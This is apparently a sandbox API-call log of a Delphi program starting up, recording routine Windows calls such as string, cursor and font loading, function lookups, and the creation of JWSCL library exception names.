[0110.259] LoadStringA (in: hInstance=0x2a40000, uID=0xff1f, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0110.259] LoadStringA (in: hInstance=0x2a40000, uID=0xff1e, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0110.259] LoadStringA (in: hInstance=0x2a40000, uID=0xff1d, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0110.259] LoadStringA (in: hInstance=0x2a40000, uID=0xff1c, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0110.259] LoadStringA (in: hInstance=0x2a40000, uID=0xff1b, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0110.259] LoadStringA (in: hInstance=0x2a40000, uID=0xff1a, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0110.259] LoadStringA (in: hInstance=0x2a40000, uID=0xff19, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0110.259] LoadStringA (in: hInstance=0x2a40000, uID=0xff18, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0110.260] LoadStringA (in: hInstance=0x2a40000, uID=0xff17, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0110.260] LoadStringA (in: hInstance=0x2a40000, uID=0xff16, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0110.260] LoadStringA (in: hInstance=0x2a40000, uID=0xff15, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0110.260] LoadStringA (in: hInstance=0x2a40000, uID=0xff14, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0110.260] LoadStringA (in: hInstance=0x2a40000, uID=0xff13, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0110.260] LoadStringA (in: hInstance=0x2a40000, uID=0xff12, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0110.260] LoadStringA (in: hInstance=0x2a40000, uID=0xff11, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0110.260] LoadStringA (in: hInstance=0x2a40000, uID=0xff10, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0110.260] LoadStringA (in: hInstance=0x2a40000, uID=0xff2f, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0110.260] LoadStringA (in: hInstance=0x2a40000, uID=0xff2e, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0110.260] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0110.260] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0110.260] GetVersion () returned 0x1db10106
[0110.260] GetCurrentProcessId () returned 0xfa4
[0110.260] GlobalAddAtomA (lpString="Delphi00000FA4") returned 0xc146
[0110.260] GetCurrentThreadId () returned 0xfa8
[0110.260] GlobalAddAtomA (lpString="ControlOfs02A4000000000FA8") returned 0xc13f
[0110.260] RegisterClipboardFormatA (lpszFormat="ControlOfs02A4000000000FA8") returned 0xc166
[0110.260] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0110.260] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0110.260] GetSystemMetrics (nIndex=19) returned 1
[0110.260] GetSystemMetrics (nIndex=75) returned 1
[0110.260] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x2b61320, fWinIni=0x0 | out: pvParam=0x2b61320) returned 1
[0110.260] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0110.260] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0110.260] LoadCursorA (hInstance=0x2a40000, lpCursorName=0x7ff9) returned 0x301bf
[0110.261] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0110.261] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0110.261] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0110.261] LoadCursorA (hInstance=0x2a40000, lpCursorName=0x7ffa) returned 0x30227
[0110.261] LoadCursorA (hInstance=0x2a40000, lpCursorName=0x7ffb) returned 0x30223
[0110.261] LoadCursorA (hInstance=0x2a40000, lpCursorName=0x7ffc) returned 0x30225
[0110.261] LoadCursorA (hInstance=0x2a40000, lpCursorName=0x7ffd) returned 0x301f7
[0110.261] LoadCursorA (hInstance=0x2a40000, lpCursorName=0x7fff) returned 0x301fb
[0110.262] LoadCursorA (hInstance=0x2a40000, lpCursorName=0x7ffe) returned 0x301fd
[0110.262] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0110.262] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0110.262] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0110.262] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0110.262] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0110.262] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0110.262] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0110.262] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0110.262] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0110.262] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0110.262] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0110.262] GetDC (hWnd=0x0) returned 0x1201087d
[0110.262] GetDeviceCaps (hdc=0x1201087d, index=90) returned 96
[0110.262] ReleaseDC (hWnd=0x0, hDC=0x1201087d) returned 1
[0110.262] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0110.262] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x2a99a60, dwData=0x2b6156c) returned 1
[0110.262] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0xcf35b, fWinIni=0x0 | out: pvParam=0xcf35b) returned 1
[0110.262] CreateFontIndirectA (lplf=0xcf35b) returned 0x660a0881
[0110.262] GetObjectA (in: h=0x660a0881, c=60, pv=0xcf14c | out: pv=0xcf14c) returned 60
[0110.263] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0xcf207, fWinIni=0x0 | out: pvParam=0xcf207) returned 1
[0110.263] CreateFontIndirectA (lplf=0xcf2e3) returned 0x130a0890
[0110.263] GetObjectA (in: h=0x130a0890, c=60, pv=0xcf14c | out: pv=0xcf14c) returned 60
[0110.263] CreateFontIndirectA (lplf=0xcf2a7) returned 0x270a0898
[0110.263] GetObjectA (in: h=0x270a0898, c=60, pv=0xcf14c | out: pv=0xcf14c) returned 60
[0110.263] LoadIconA (hInstance=0x0, lpIconName="MAINICON") returned 0x0
[0110.263] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xcf2bb, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0110.263] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0xcf2bb | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0110.263] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x150000
[0110.264] GetKeyboardLayoutList (in: nBuff=64, lpList=0xcf23c | out: lpList=0xcf23c) returned 1
[0110.264] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0110.264] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0110.265] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6ced0000
[0110.265] GetProcAddress (hModule=0x6ced0000, lpProcName="InitializeFlatSB") returned 0x6cf0266f
[0110.265] GetProcAddress (hModule=0x6ced0000, lpProcName="UninitializeFlatSB") returned 0x6cf02542
[0110.265] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollProp") returned 0x6cf01d29
[0110.265] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollProp") returned 0x6cf0238d
[0110.265] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_EnableScrollBar") returned 0x6cf020c9
[0110.265] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_ShowScrollBar") returned 0x6cf01fdb
[0110.265] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollRange") returned 0x6cf01e8d
[0110.265] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollInfo") returned 0x6cf01f0f
[0110.266] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollPos") returned 0x6cf01ccd
[0110.266] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollPos") returned 0x6cf0216d
[0110.266] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollInfo") returned 0x6cf022be
[0110.266] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollRange") returned 0x6cf021e2
[0110.266] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0110.266] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0110.266] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0110.266] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76a20000
[0110.266] GetProcAddress (hModule=0x76a20000, lpProcName="CoCreateInstanceEx") returned 0x76a69d4e
[0110.266] GetProcAddress (hModule=0x76a20000, lpProcName="CoInitializeEx") returned 0x76a609ad
[0110.266] GetProcAddress (hModule=0x76a20000, lpProcName="CoAddRefServerProcess") returned 0x76a83cf3
[0110.266] GetProcAddress (hModule=0x76a20000, lpProcName="CoReleaseServerProcess") returned 0x76a84314
[0110.266] GetProcAddress (hModule=0x76a20000, lpProcName="CoResumeClassObjects") returned 0x76a2ea02
[0110.266] GetProcAddress (hModule=0x76a20000, lpProcName="CoSuspendClassObjects") returned 0x76a8bb02
[0110.267] LoadStringA (in: hInstance=0x2a40000, uID=0xff59, lpBuffer=0xcef9c, cchBufferMax=1024 | out: lpBuffer="Metafiles") returned 0x9
[0110.267] CharLowerBuffA (in: lpsz="wmf", cchLength=0x3 | out: lpsz="wmf") returned 0x3
[0110.267] LoadStringA (in: hInstance=0x2a40000, uID=0xff5a, lpBuffer=0xcef9c, cchBufferMax=1024 | out: lpBuffer="Enhanced Metafiles") returned 0x12
[0110.267] CharLowerBuffA (in: lpsz="emf", cchLength=0x3 | out: lpsz="emf") returned 0x3
[0110.267] LoadStringA (in: hInstance=0x2a40000, uID=0xff5b, lpBuffer=0xcef9c, cchBufferMax=1024 | out: lpBuffer="Icons") returned 0x5
[0110.267] CharLowerBuffA (in: lpsz="ico", cchLength=0x3 | out: lpsz="ico") returned 0x3
[0110.267] LoadStringA (in: hInstance=0x2a40000, uID=0xff5c, lpBuffer=0xcef9c, cchBufferMax=1024 | out: lpBuffer="Bitmaps") returned 0x7
[0110.267] CharLowerBuffA (in: lpsz="bmp", cchLength=0x3 | out: lpsz="bmp") returned 0x3
[0110.267] SetErrorMode (uMode=0x8000) returned 0x1
[0110.267] LoadLibraryA (lpLibFileName="olepro32.dll") returned 0x6ceb0000
[0110.272] SetErrorMode (uMode=0x1) returned 0x8000
[0110.272] GetProcAddress (hModule=0x6ceb0000, lpProcName="OleCreatePropertyFrame") returned 0x6ceb20ea
[0110.272] GetProcAddress (hModule=0x6ceb0000, lpProcName="OleCreateFontIndirect") returned 0x6ceb20b7
[0110.272] GetProcAddress (hModule=0x6ceb0000, lpProcName="OleCreatePictureIndirect") returned 0x6ceb20c8
[0110.272] GetProcAddress (hModule=0x6ceb0000, lpProcName="OleLoadPicture") returned 0x6ceb20d9
[0110.272] SysReAllocStringLen (in: pbstr=0x2b2fa98*=0x0, psz="EJwsclUnsupportedException", len=0x1a | out: pbstr=0x2b2fa98*="EJwsclUnsupportedException") returned 1
[0110.272] SysReAllocStringLen (in: pbstr=0x2b2fa80*=0x0, psz="EJwsclPIDException", len=0x12 | out: pbstr=0x2b2fa80*="EJwsclPIDException") returned 1
[0110.272] SysReAllocStringLen (in: pbstr=0x2b2fa68*=0x0, psz="EJwsclJwShellExecuteException", len=0x1d | out: pbstr=0x2b2fa68*="EJwsclJwShellExecuteException") returned 1
[0110.272] SysReAllocStringLen (in: pbstr=0x2b2fa50*=0x0, psz="EJwsclShellExecuteException", len=0x1b | out: pbstr=0x2b2fa50*="EJwsclShellExecuteException") returned 1
[0110.272] SysReAllocStringLen (in: pbstr=0x2b2fa38*=0x0, psz="EJwsclElevationException", len=0x18 | out: pbstr=0x2b2fa38*="EJwsclElevationException") returned 1
[0110.272] SysReAllocStringLen (in: pbstr=0x2b2fa20*=0x0, psz="EJwsclAbortException", len=0x14 | out: pbstr=0x2b2fa20*="EJwsclAbortException") returned 1
[0110.272] SysReAllocStringLen (in: pbstr=0x2b2fa08*=0x0, psz="EJwsclSuRunErrorException", len=0x19 | out: pbstr=0x2b2fa08*="EJwsclSuRunErrorException") returned 1
[0110.272] SysReAllocStringLen (in: pbstr=0x2b2f9f0*=0x0, psz="EJwsclElevateProcessException", len=0x1d | out: pbstr=0x2b2f9f0*="EJwsclElevateProcessException") returned 1
[0110.272] SysReAllocStringLen (in: pbstr=0x2b2f9d8*=0x0, psz="EJwsclCertApiException", len=0x16 | out: pbstr=0x2b2f9d8*="EJwsclCertApiException") returned 1
[0110.272] SysReAllocStringLen (in: pbstr=0x2b2f9c0*=0x0, psz="EJwsclVistaFeaturesDisabled", len=0x1b | out: pbstr=0x2b2f9c0*="EJwsclVistaFeaturesDisabled") returned 1
[0110.272] SysReAllocStringLen (in: pbstr=0x2b2f9a8*=0x0, psz="EJwsclInvalidStartupInfo", len=0x18 | out: pbstr=0x2b2f9a8*="EJwsclInvalidStartupInfo") returned 1
[0110.273] SysReAllocStringLen (in: pbstr=0x2b2f990*=0x0, psz="EJwsclFirewallNoExceptionsException", len=0x23 | out: pbstr=0x2b2f990*="EJwsclFirewallNoExceptionsException") returned 1
[0110.273] SysReAllocStringLen (in: pbstr=0x2b2f978*=0x0, psz="EJwsclFirewallInactiveException", len=0x1f | out: pbstr=0x2b2f978*="EJwsclFirewallInactiveException") returned 1
[0110.273] SysReAllocStringLen (in: pbstr=0x2b2f960*=0x0, psz="EJwsclFirewallDelRuleException", len=0x1e | out: pbstr=0x2b2f960*="EJwsclFirewallDelRuleException") returned 1
[0110.273] SysReAllocStringLen (in: pbstr=0x2b2f948*=0x0, psz="EJwsclAddUdpPortToFirewallException", len=0x23 | out: pbstr=0x2b2f948*="EJwsclAddUdpPortToFirewallException") returned 1
[0110.273] SysReAllocStringLen (in: pbstr=0x2b2f930*=0x0, psz="EJwsclAddTcpPortToFirewallException", len=0x23 | out: pbstr=0x2b2f930*="EJwsclAddTcpPortToFirewallException") returned 1
[0110.273] SysReAllocStringLen (in: pbstr=0x2b2f918*=0x0, psz="EJwsclFirewallAddRuleException", len=0x1e | out: pbstr=0x2b2f918*="EJwsclFirewallAddRuleException") returned 1
[0110.273] SysReAllocStringLen (in: pbstr=0x2b2f900*=0x0, psz="EJwsclSetRemoteAdminAdressException", len=0x23 | out: pbstr=0x2b2f900*="EJwsclSetRemoteAdminAdressException") returned 1
[0110.273] SysReAllocStringLen (in: pbstr=0x2b2f8e8*=0x0, psz="EJwsclGetRemoteAdminAdressException", len=0x23 | out: pbstr=0x2b2f8e8*="EJwsclGetRemoteAdminAdressException") returned 1
[0110.273] SysReAllocStringLen (in: pbstr=0x2b2f8d0*=0x0, psz="EJwsclSetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x2b2f8d0*="EJwsclSetRemoteAdminAllowedException") returned 1
[0110.273] SysReAllocStringLen (in: pbstr=0x2b2f8b8*=0x0, psz="EJwsclGetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x2b2f8b8*="EJwsclGetRemoteAdminAllowedException") returned 1
[0110.273] SysReAllocStringLen (in: pbstr=0x2b2f8a0*=0x0, psz="EJwsclSetIncomingPingAllowedException", len=0x25 | out: pbstr=0x2b2f8a0*="EJwsclSetIncomingPingAllowedException") returned 1
[0110.273] SysReAllocStringLen (in: pbstr=0x2b2f888*=0x0, psz="EJwsclGetIncomingPingAllowedException", len=0x25 | out: pbstr=0x2b2f888*="EJwsclGetIncomingPingAllowedException") returned 1
[0110.273] SysReAllocStringLen (in: pbstr=0x2b2f870*=0x0, psz="EJwsclSetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x2b2f870*="EJwsclSetFWExceptionsAllowedException") returned 1
[0110.273] SysReAllocStringLen (in: pbstr=0x2b2f858*=0x0, psz="EJwsclGetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x2b2f858*="EJwsclGetFWExceptionsAllowedException") returned 1
[0110.273] SysReAllocStringLen (in: pbstr=0x2b2f840*=0x0, psz="EJwsclGetFWStateException", len=0x19 | out: pbstr=0x2b2f840*="EJwsclGetFWStateException") returned 1
[0110.273] SysReAllocStringLen (in: pbstr=0x2b2f828*=0x0, psz="EJwsclSetFWStateException", len=0x19 | out: pbstr=0x2b2f828*="EJwsclSetFWStateException") returned 1
[0110.273] SysReAllocStringLen (in: pbstr=0x2b2f810*=0x0, psz="EJwsclFirewallProfileInitException", len=0x22 | out: pbstr=0x2b2f810*="EJwsclFirewallProfileInitException") returned 1
[0110.273] SysReAllocStringLen (in: pbstr=0x2b2f7f8*=0x0, psz="EJwsclFirewallInitException", len=0x1b | out: pbstr=0x2b2f7f8*="EJwsclFirewallInitException") returned 1
[0110.273] SysReAllocStringLen (in: pbstr=0x2b2f7e0*=0x0, psz="EJwsclGenericFirewallException", len=0x1e | out: pbstr=0x2b2f7e0*="EJwsclGenericFirewallException") returned 1
[0110.273] SysReAllocStringLen (in: pbstr=0x2b2f7c8*=0x0, psz="EJwsclEnumerateProcessFailed", len=0x1c | out: pbstr=0x2b2f7c8*="EJwsclEnumerateProcessFailed") returned 1
[0110.273] SysReAllocStringLen (in: pbstr=0x2b2f7b0*=0x0, psz="EJwsclInvalidRegistryPath", len=0x19 | out: pbstr=0x2b2f7b0*="EJwsclInvalidRegistryPath") returned 1
[0110.273] SysReAllocStringLen (in: pbstr=0x2b2f798*=0x0, psz="EJwsclEndOfStream", len=0x11 | out: pbstr=0x2b2f798*="EJwsclEndOfStream") returned 1
[0110.273] SysReAllocStringLen (in: pbstr=0x2b2f780*=0x0, psz="EJwsclClassTypeMismatch", len=0x17 | out: pbstr=0x2b2f780*="EJwsclClassTypeMismatch") returned 1
[0110.273] SysReAllocStringLen (in: pbstr=0x2b2f768*=0x0, psz="EJwsclInvalidHandle", len=0x13 | out: pbstr=0x2b2f768*="EJwsclInvalidHandle") returned 1
[0110.273] SysReAllocStringLen (in: pbstr=0x2b2f750*=0x0, psz="EJwsclInvalidIndex", len=0x12 | out: pbstr=0x2b2f750*="EJwsclInvalidIndex") returned 1
[0110.273] SysReAllocStringLen (in: pbstr=0x2b2f738*=0x0, psz="EJwsclInvalidSession", len=0x14 | out: pbstr=0x2b2f738*="EJwsclInvalidSession") returned 1
[0110.273] SysReAllocStringLen (in: pbstr=0x2b2f720*=0x0, psz="EJwsclMissingEvent", len=0x12 | out: pbstr=0x2b2f720*="EJwsclMissingEvent") returned 1
[0110.273] SysReAllocStringLen (in: pbstr=0x2b2f708*=0x0, psz="EJwsclInvalidPointerType", len=0x18 | out: pbstr=0x2b2f708*="EJwsclInvalidPointerType") returned 1
[0110.273] SysReAllocStringLen (in: pbstr=0x2b2f6f0*=0x0, psz="EJwsclCreateProcessFailed", len=0x19 | out: pbstr=0x2b2f6f0*="EJwsclCreateProcessFailed") returned 1
[0110.273] SysReAllocStringLen (in: pbstr=0x2b2f6d8*=0x0, psz="EJwsclNilPointer", len=0x10 | out: pbstr=0x2b2f6d8*="EJwsclNilPointer") returned 1
[0110.273] SysReAllocStringLen (in: pbstr=0x2b2f6c0*=0x0, psz="EJwsclUnimplemented", len=0x13 | out: pbstr=0x2b2f6c0*="EJwsclUnimplemented") returned 1
[0110.274] SysReAllocStringLen (in: pbstr=0x2b2f6a8*=0x0, psz="EJwsclInitWellKnownException", len=0x1c | out: pbstr=0x2b2f6a8*="EJwsclInitWellKnownException") returned 1
[0110.274] SysReAllocStringLen (in: pbstr=0x2b2f690*=0x0, psz="EJwsclKeyApiException", len=0x15 | out: pbstr=0x2b2f690*="EJwsclKeyApiException") returned 1
[0110.274] SysReAllocStringLen (in: pbstr=0x2b2f678*=0x0, psz="EJwsclKeyException", len=0x12 | out: pbstr=0x2b2f678*="EJwsclKeyException") returned 1
[0110.274] SysReAllocStringLen (in: pbstr=0x2b2f660*=0x0, psz="EJwsclHashApiException", len=0x16 | out: pbstr=0x2b2f660*="EJwsclHashApiException") returned 1
[0110.274] SysReAllocStringLen (in: pbstr=0x2b2f648*=0x0, psz="EJwsclHashException", len=0x13 | out: pbstr=0x2b2f648*="EJwsclHashException") returned 1
[0110.274] SysReAllocStringLen (in: pbstr=0x2b2f630*=0x0, psz="EJwsclCSPApiException", len=0x15 | out: pbstr=0x2b2f630*="EJwsclCSPApiException") returned 1
[0110.274] SysReAllocStringLen (in: pbstr=0x2b2f618*=0x0, psz="EJwsclCSPException", len=0x12 | out: pbstr=0x2b2f618*="EJwsclCSPException") returned 1
[0110.274] SysReAllocStringLen (in: pbstr=0x2b2f600*=0x0, psz="EJwsclTerminalSessionException", len=0x1e | out: pbstr=0x2b2f600*="EJwsclTerminalSessionException") returned 1
[0110.274] SysReAllocStringLen (in: pbstr=0x2b2f5e8*=0x0, psz="EJwsclTerminalServiceNecessary", len=0x1e | out: pbstr=0x2b2f5e8*="EJwsclTerminalServiceNecessary") returned 1
[0110.274] SysReAllocStringLen (in: pbstr=0x2b2f5d0*=0x0, psz="EJwsclTerminalServiceException", len=0x1e | out: pbstr=0x2b2f5d0*="EJwsclTerminalServiceException") returned 1
[0110.274] SysReAllocStringLen (in: pbstr=0x2b2f5b8*=0x0, psz="EJwsclTerminalServerConnectException", len=0x24 | out: pbstr=0x2b2f5b8*="EJwsclTerminalServerConnectException") returned 1
[0110.274] SysReAllocStringLen (in: pbstr=0x2b2f5a0*=0x0, psz="EJwsclTerminalServerException", len=0x1d | out: pbstr=0x2b2f5a0*="EJwsclTerminalServerException") returned 1
[0110.274] SysReAllocStringLen (in: pbstr=0x2b2f588*=0x0, psz="EJwsclCryptUnsupportedException", len=0x1f | out: pbstr=0x2b2f588*="EJwsclCryptUnsupportedException") returned 1
[0110.274] SysReAllocStringLen (in: pbstr=0x2b2f570*=0x0, psz="EJwsclCryptApiException", len=0x17 | out: pbstr=0x2b2f570*="EJwsclCryptApiException") returned 1
[0110.274] SysReAllocStringLen (in: pbstr=0x2b2f558*=0x0, psz="EJwsclCryptException", len=0x14 | out: pbstr=0x2b2f558*="EJwsclCryptException") returned 1
[0110.274] SysReAllocStringLen (in: pbstr=0x2b2f540*=0x0, psz="EJwsclOSError", len=0xd | out: pbstr=0x2b2f540*="EJwsclOSError") returned 1
[0110.274] SysReAllocStringLen (in: pbstr=0x2b2f528*=0x0, psz="EJwsclResourceInitFailed", len=0x18 | out: pbstr=0x2b2f528*="EJwsclResourceInitFailed") returned 1
[0110.274] SysReAllocStringLen (in: pbstr=0x2b2f510*=0x0, psz="EJwsclResourceUnequalCount", len=0x1a | out: pbstr=0x2b2f510*="EJwsclResourceUnequalCount") returned 1
[0110.274] SysReAllocStringLen (in: pbstr=0x2b2f4f8*=0x0, psz="EJwsclResourceNotFound", len=0x16 | out: pbstr=0x2b2f4f8*="EJwsclResourceNotFound") returned 1
[0110.274] SysReAllocStringLen (in: pbstr=0x2b2f4e0*=0x0, psz="EJwsclResourceException", len=0x17 | out: pbstr=0x2b2f4e0*="EJwsclResourceException") returned 1
[0110.274] SysReAllocStringLen (in: pbstr=0x2b2f4c8*=0x0, psz="EJwsclFailedAddACE", len=0x12 | out: pbstr=0x2b2f4c8*="EJwsclFailedAddACE") returned 1
[0110.274] SysReAllocStringLen (in: pbstr=0x2b2f4b0*=0x0, psz="EJwsclUnsupportedACE", len=0x14 | out: pbstr=0x2b2f4b0*="EJwsclUnsupportedACE") returned 1
[0110.274] SysReAllocStringLen (in: pbstr=0x2b2f498*=0x0, psz="EJwsclOpenWindowStationException", len=0x20 | out: pbstr=0x2b2f498*="EJwsclOpenWindowStationException") returned 1
[0110.274] SysReAllocStringLen (in: pbstr=0x2b2f480*=0x0, psz="EJwsclWindowStationException", len=0x1c | out: pbstr=0x2b2f480*="EJwsclWindowStationException") returned 1
[0110.274] SysReAllocStringLen (in: pbstr=0x2b2f468*=0x0, psz="EJwsclCloseDesktopException", len=0x1b | out: pbstr=0x2b2f468*="EJwsclCloseDesktopException") returned 1
[0110.274] SysReAllocStringLen (in: pbstr=0x2b2f450*=0x0, psz="EJwsclCreateDesktopException", len=0x1c | out: pbstr=0x2b2f450*="EJwsclCreateDesktopException") returned 1
[0110.274] SysReAllocStringLen (in: pbstr=0x2b2f438*=0x0, psz="EJwsclOpenDesktopException", len=0x1a | out: pbstr=0x2b2f438*="EJwsclOpenDesktopException") returned 1
[0110.274] SysReAllocStringLen (in: pbstr=0x2b2f420*=0x0, psz="EJwsclDesktopException", len=0x16 | out: pbstr=0x2b2f420*="EJwsclDesktopException") returned 1
[0110.274] SysReAllocStringLen (in: pbstr=0x2b2f408*=0x0, psz="EJwsclSACLAccessDenied", len=0x16 | out: pbstr=0x2b2f408*="EJwsclSACLAccessDenied") returned 1
[0110.274] SysReAllocStringLen (in: pbstr=0x2b2f3f0*=0x0, psz="EJwsclAccessDenied", len=0x12 | out: pbstr=0x2b2f3f0*="EJwsclAccessDenied") returned 1
[0110.274] SysReAllocStringLen (in: pbstr=0x2b2f3d8*=0x0, psz="EJwsclLSAException", len=0x12 | out: pbstr=0x2b2f3d8*="EJwsclLSAException") returned 1
[0110.274] SysReAllocStringLen (in: pbstr=0x2b2f3c0*=0x0, psz="ESetOwnerException", len=0x12 | out: pbstr=0x2b2f3c0*="ESetOwnerException") returned 1
[0110.274] SysReAllocStringLen (in: pbstr=0x2b2f3a8*=0x0, psz="ESetSecurityException", len=0x15 | out: pbstr=0x2b2f3a8*="ESetSecurityException") returned 1
[0110.274] SysReAllocStringLen (in: pbstr=0x2b2f390*=0x0, psz="EJwsclInvalidParentDescriptor", len=0x1d | out: pbstr=0x2b2f390*="EJwsclInvalidParentDescriptor") returned 1
[0110.274] SysReAllocStringLen (in: pbstr=0x2b2f378*=0x0, psz="EJwsclInvalidKeyPath", len=0x14 | out: pbstr=0x2b2f378*="EJwsclInvalidKeyPath") returned 1
[0110.275] SysReAllocStringLen (in: pbstr=0x2b2f360*=0x0, psz="EJwsclInvalidGenericAccessMask", len=0x1e | out: pbstr=0x2b2f360*="EJwsclInvalidGenericAccessMask") returned 1
[0110.275] SysReAllocStringLen (in: pbstr=0x2b2f348*=0x0, psz="EJwsclAdaptSecurityInfoException", len=0x20 | out: pbstr=0x2b2f348*="EJwsclAdaptSecurityInfoException") returned 1
[0110.275] SysReAllocStringLen (in: pbstr=0x2b2f330*=0x0, psz="EJwsclThreadException", len=0x15 | out: pbstr=0x2b2f330*="EJwsclThreadException") returned 1
[0110.275] SysReAllocStringLen (in: pbstr=0x2b2f318*=0x0, psz="EJwsclInvalidObjectException", len=0x1c | out: pbstr=0x2b2f318*="EJwsclInvalidObjectException") returned 1
[0110.275] SysReAllocStringLen (in: pbstr=0x2b2f300*=0x0, psz="EJwsclSecurityObjectException", len=0x1d | out: pbstr=0x2b2f300*="EJwsclSecurityObjectException") returned 1
[0110.275] SysReAllocStringLen (in: pbstr=0x2b2f2e8*=0x0, psz="EJwsclHashMismatch", len=0x12 | out: pbstr=0x2b2f2e8*="EJwsclHashMismatch") returned 1
[0110.275] SysReAllocStringLen (in: pbstr=0x2b2f2d0*=0x0, psz="EJwsclStreamHashException", len=0x19 | out: pbstr=0x2b2f2d0*="EJwsclStreamHashException") returned 1
[0110.275] SysReAllocStringLen (in: pbstr=0x2b2f2b8*=0x0, psz="EJwsclStreamInvalidMagicException", len=0x21 | out: pbstr=0x2b2f2b8*="EJwsclStreamInvalidMagicException") returned 1
[0110.275] SysReAllocStringLen (in: pbstr=0x2b2f2a0*=0x0, psz="EJwsclStreamSizeException", len=0x19 | out: pbstr=0x2b2f2a0*="EJwsclStreamSizeException") returned 1
[0110.275] SysReAllocStringLen (in: pbstr=0x2b2f288*=0x0, psz="EJwsclStreamException", len=0x15 | out: pbstr=0x2b2f288*="EJwsclStreamException") returned 1
[0110.275] SysReAllocStringLen (in: pbstr=0x2b2f270*=0x0, psz="EJwsclNoSuchLogonSession", len=0x18 | out: pbstr=0x2b2f270*="EJwsclNoSuchLogonSession") returned 1
[0110.275] SysReAllocStringLen (in: pbstr=0x2b2f258*=0x0, psz="EJwsclInvalidFlagsException", len=0x1b | out: pbstr=0x2b2f258*="EJwsclInvalidFlagsException") returned 1
